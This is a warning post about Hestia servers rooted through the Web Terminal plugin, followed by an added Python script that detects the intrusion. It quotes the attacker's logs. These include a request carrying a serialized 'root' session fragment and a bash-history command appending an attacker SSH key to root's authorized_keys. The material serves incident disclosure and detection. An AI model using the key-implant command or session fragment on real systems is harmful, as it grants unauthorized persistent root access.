NOTICE: If you are running the Web Terminal plugin disable it ASAP.
The Web Terminal can be exploited to gain root. I currently have 2 Hestia servers and both were hacked via the Web Terminal. I'm still investigating the incident, but this is what I know so far:
This is the entry point
# /var/log/hestia/nginx-access.log.1
45.86.230.242 - - [22/May/2026:01:18:16 +0000] GET /login/ HTTP/1.1 "200" 1928 "-" "-" "user|s:4:\x22root"
45.86.230.242 - - [22/May/2026:01:18:22 +0000] GET /_shell/ HTTP/1.1 "101" 271 "-" "-" "-"
The web-terminal journal:
# journalctl -u hestia-web-terminal.service
May 22 01:18:18 web2 server.js[3506304]: New connection from 45.86.230.242 (0tk5i6u95ua5inti4o2h9lv2si)
May 22 01:18:18 web2 server.js[3506304]: New pty (680948): /bin/bash as root (0:0) in /root
May 22 01:18:22 web2 server.js[3506304]: Ended connection from 45.86.230.242 (0tk5i6u95ua5inti4o2h9lv2si)
May 22 01:18:22 web2 server.js[3506304]: Ended pty (680948)
The root bash history:
# /root/.bash_history
stty -echo
printf '\n__X521699__\n' && id 2>&1 && printf '\n__X521699__\n'
printf '\n__X355356__\n' && echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzrZrugAO/eiPw1kZEZYw7gggHrzoihyQHjncajJoOSu5oeN2HrSdTogZuT+8CQJx5TaTuJCmeaA6MyHKF3fBR7qd5+R94k9oPxNoz0M9I4yzJFXQr5qNQRIR98Edt/uCwqnw9uXiKwOmCtnBiY/BJ7g5aC238nDBIyufcX6Ca7JtfwJtLxQpvKBkpW1STt3ShyAhQSyiFcCeuz7J10dw+PDDiHxSIfI6lie1T7hi3chYBjq21eJBzJg/BCo5ZzbwJIXNfPqtCeJINZKQxUDLFTAK0jkyxQXfNJ9H4WPVEagxYXHB1PEBhXcCQ68CUgdikWKHXX2WTRYGPhMp5zf ' >> /root/.ssh/authorized_keys 2>&1 && printf '\n__X355356__\n'
exit
This adds new key(s) into /root/.ssh/authorized_keys. This is all I know so far. Still investigating. Just wanted to get the warning out there.
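The three artifacts quoted in this post (the nginx access log, the hestia-web-terminal journal and /root/.ssh/authorized_keys) are what an admin would want to sweep on every other Hestia host. The script below is an added example, not code from the post or from the Hestia project. It takes the log lines exactly as quoted above as constructed sample input, flags every request to /_shell/ that nginx answered with 101 (a WebSocket upgrade, i.e. one terminal session), pairs it with a "New pty ... as root" journal entry from the same IP within a time window, and lists authorized_keys entries whose key material is not on an allow-list. Assumptions, all of mine and not from the post: the nginx log format is the one visible in the excerpt (ip - user [time] METHOD PATH PROTO "status" bytes "f1" "f2" "f3"), the host clock used by journalctl is UTC like the nginx timestamps, the 60-second correlation window, and the placeholder key blobs in the sample authorized_keys. The `user|s:4:\x22root` fragment is flagged only because it appears in the post's first log line; the post does not explain what it is.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample input: the lines quoted in the post plus one benign line
# (203.0.113.9) added to show that it is not flagged. Not a live log.
NGINX_LINES = [
    r'45.86.230.242 - - [22/May/2026:01:18:16 +0000] GET /login/ HTTP/1.1 "200" 1928 "-" "-" "user|s:4:\x22root"',
    r'45.86.230.242 - - [22/May/2026:01:18:22 +0000] GET /_shell/ HTTP/1.1 "101" 271 "-" "-" "-"',
    r'203.0.113.9 - - [22/May/2026:01:20:01 +0000] GET /login/ HTTP/1.1 "200" 1928 "-" "-" "-"',
]
JOURNAL_LINES = [
    "May 22 01:18:18 web2 server.js[3506304]: New connection from 45.86.230.242 (0tk5i6u95ua5inti4o2h9lv2si)",
    "May 22 01:18:18 web2 server.js[3506304]: New pty (680948): /bin/bash as root (0:0) in /root",
    "May 22 01:18:22 web2 server.js[3506304]: Ended connection from 45.86.230.242 (0tk5i6u95ua5inti4o2h9lv2si)",
    "May 22 01:18:22 web2 server.js[3506304]: Ended pty (680948)",
]
# Constructed authorized_keys: the blobs are placeholders, not real keys.
AUTHORIZED_KEYS = "\n".join([
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKnownAdminKey admin@laptop",
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzrZrugAO/placeholder ",  # stand-in for the implanted key
])
KNOWN_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIExampleKnownAdminKey"}

# Log format assumed from the post's excerpt (see lead-in).
NGINX_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] (?P<method>\S+) (?P<path>\S+) \S+ '
    r'"(?P<status>\d{3})" \d+ "[^"]*" "[^"]*" "(?P<last>[^"]*)"$')
JOURNAL_RE = re.compile(r'^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ server\.js\[\d+\]: (?P<msg>.*)$')
CONN_RE = re.compile(r'^New connection from (?P<ip>\S+) \((?P<sid>[^)]+)\)$')
PTY_RE = re.compile(r'^New pty \((?P<pty>\d+)\): (?P<shell>\S+) as (?P<user>\S+) \((?P<uid>\d+):\d+\)')
# nginx-escaped quote inside a PHP-serialized string, as in the post's first log line.
SESSION_FRAGMENT_RE = re.compile(r'\|s:\d+:\\x22')


def parse_nginx(line):
    m = NGINX_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["time"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return d


def shell_upgrades(lines):
    """Requests to the web terminal endpoint answered with 101: one per terminal session.
    nginx writes the access-log line when the request ends, so for a WebSocket the
    timestamp is the session's end (the post's 01:18:22 matches 'Ended connection')."""
    return [d for d in map(parse_nginx, lines)
            if d and d["path"].startswith("/_shell") and d["status"] == "101"]


def session_fragment_hits(lines):
    """Lines whose trailing quoted field carries a PHP-serialized fragment like user|s:4:\x22root."""
    return [d for d in map(parse_nginx, lines) if d and SESSION_FRAGMENT_RE.search(d["last"])]


def root_ptys(journal_lines, year):
    """Pair each 'New pty ... as root' line with the most recent 'New connection from <ip>'.
    journalctl prints no year and local time; assumed UTC here."""
    out, last_ip = [], None
    for line in journal_lines:
        m = JOURNAL_RE.match(line)
        if not m:
            continue
        when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S").replace(tzinfo=timezone.utc)
        c = CONN_RE.match(m["msg"])
        if c:
            last_ip = c["ip"]
            continue
        p = PTY_RE.match(m["msg"])
        if p and p["uid"] == "0":
            out.append({"time": when, "ip": last_ip, "pty": p["pty"], "user": p["user"], "shell": p["shell"]})
    return out


def correlate(nginx_lines, journal_lines, window=timedelta(seconds=60)):
    """Each /_shell/ upgrade matched with a root pty from the same IP within `window`."""
    findings = []
    for up in shell_upgrades(nginx_lines):
        for pty in root_ptys(journal_lines, up["time"].year):
            if pty["ip"] == up["ip"] and abs(pty["time"] - up["time"]) <= window:
                findings.append({"ip": up["ip"], "pty": pty["pty"], "user": pty["user"],
                                 "pty_opened": pty["time"].isoformat(), "nginx_time": up["time"].isoformat()})
    return findings


def unexpected_keys(authorized_keys_text, known_blobs):
    """authorized_keys lines whose key material is not in the allow-list (options before the type are tolerated)."""
    found = []
    for line in authorized_keys_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        for i, p in enumerate(parts[:-1]):
            if p.startswith(("ssh-", "ecdsa-", "sk-")):
                if parts[i + 1] not in known_blobs:
                    found.append(line)
                break
    return found


if __name__ == "__main__":
    for f in correlate(NGINX_LINES, JOURNAL_LINES):
        print("ROOT WEB-TERMINAL SESSION", f)
    for d in session_fragment_hits(NGINX_LINES):
        print("SERIALIZED SESSION FRAGMENT", d["ip"], d["last"])
    for line in unexpected_keys(AUTHORIZED_KEYS, KNOWN_BLOBS):
        print("UNKNOWN KEY", line)
```

On a real host, feed `/var/log/hestia/nginx-access.log*` and the output of `journalctl -u hestia-web-terminal.service -o short` into the same functions, and seed `KNOWN_BLOBS` from a copy of authorized_keys taken before the Web Terminal was enabled; any session the script pairs with a root pty from an address you do not recognise is a host to treat as compromised, not just one to clean the key from.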